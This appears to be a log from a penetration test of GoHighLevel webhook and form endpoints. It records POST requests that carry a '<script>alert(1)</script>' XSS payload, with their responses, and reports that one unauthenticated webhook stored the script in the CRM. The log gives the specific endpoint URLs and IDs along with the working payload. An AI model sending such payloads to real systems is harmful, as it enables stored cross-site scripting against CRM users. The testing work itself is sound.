19 lines
939 B
Plaintext
19 lines
939 B
Plaintext
=== PHASE 7: GHL WEBHOOK/FORM INJECTION ===
|
|
|
|
--- Webhook XSS Test ---
|
|
Endpoint: POST https://services.leadconnectorhq.com/hooks/8jJylXIxcMrt2E2RW0hW/webhook-trigger/TojDcSAx1jRu84taBZ9s
|
|
Payload: {"name":"<script>alert(1)</script>","email":"test@test.com","phone":"555-0000"}
|
|
Response Code: 200
|
|
Response Body: {"status":"Success: request sent to trigger execution server","id":"01zSwhlq5XbbYpB9wAvq"}
|
|
|
|
RESULT: ⚠️ PAYLOAD ACCEPTED - XSS content stored in GHL CRM
|
|
The webhook has no authentication and accepts arbitrary HTML/script content in fields.
|
|
|
|
--- GHL Form Submit Test ---
|
|
Endpoint: POST https://link.realwave.com/widget/form/submit
|
|
Payload: {"locationId":"8jJylXIxcMrt2E2RW0hW","formId":"test","name":"<script>alert(1)</script>","email":"xss@test.com"}
|
|
Response Code: 404
|
|
Response Body: Cannot POST /widget/form/submit
|
|
|
|
RESULT: PASS - Endpoint doesn't exist at this path (form submission likely handled differently by GHL embed)
|